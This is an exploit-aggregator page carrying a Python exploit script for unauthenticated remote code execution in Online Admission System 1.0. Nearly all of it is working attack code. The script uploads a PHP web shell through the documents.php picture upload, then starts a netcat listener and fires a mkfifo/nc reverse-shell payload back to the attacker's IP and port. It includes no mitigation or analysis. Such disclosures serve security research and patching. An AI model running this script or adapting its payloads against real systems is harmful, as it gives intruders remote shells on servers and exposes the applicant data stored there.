Exploit for Online Admission System 1.0 Remote Code Execution

Name: Exploit for Online Admission System 1.0 Remote Code Execution
Rating: 5 (170 reviews)
2022-01-05 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:165453
# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 23/12/2021  
# Exploit Author: Jeremiasz Pluta  
# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System  
# Software Link: https://github.com/rskoolrash/Online-Admission-System  
# Tested on: LAMP Stack (Debian 10)  
  
#!/usr/bin/python  
import sys  
import re  
import argparse  
import requests  
import time  
import subprocess  
  
print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)')  
  
path = '/' #change me if the path to the /oas is in the root directory or another subdir  
  
class Exploit:  
  
def __init__(self, target_ip, target_port, localhost, localport):  
self.target_ip = target_ip  
self.target_port = target_port  
self.localhost = localhost  
self.localport = localport  
  
def exploitation(self):  
payload = """<?php system($_GET['cmd']); ?>"""  
payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""  
  
url = 'http://' + target_ip + ':' + target_port + path  
r = requests.Session()  
  
print('[*] Resolving URL...')  
r1 = r.get(url + 'documents.php')  
time.sleep(3)  
  
#Upload the payload file  
print('[*] Uploading the webshell payload...')  
files = {  
'fpic': ('cmd.php', payload + '\n', 'application/x-php'),  
'ftndoc': ('', '', 'application/octet-stream'),  
'ftcdoc': ('', '', 'application/octet-stream'),  
'fdmdoc': ('', '', 'application/octet-stream'),  
'ftcdoc': ('', '', 'application/octet-stream'),  
'fdcdoc': ('', '', 'application/octet-stream'),  
'fide': ('', '', 'application/octet-stream'),  
'fsig': ('', '', 'application/octet-stream'),  
}  
data = {'fpicup':'Submit Query'}  
r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data)  
time.sleep(3)  
  
print('[*] Setting up netcat listener...')  
listener = subprocess.Popen(["nc", "-nvlp", self.localport])  
time.sleep(3)  
  
print('[*] Spawning reverse shell...')  
print('[*] Watchout!')  
r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2)  
time.sleep(3)  
  
if (r3.status_code == 200):  
print('[*] Got shell!')  
while True:  
listener.wait()  
else:  
print('[-] Something went wrong!')  
listener.terminate()  
  
def get_args():  
parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)')  
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')  
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')  
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')  
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')  
args = parser.parse_args()  
return args  
  
args = get_args()  
target_ip = args.url  
target_port = args.target_port  
localhost = args.localhost  
localport = args.localport  
  
exp = Exploit(target_ip, target_port, localhost, localport)  
exp.exploitation()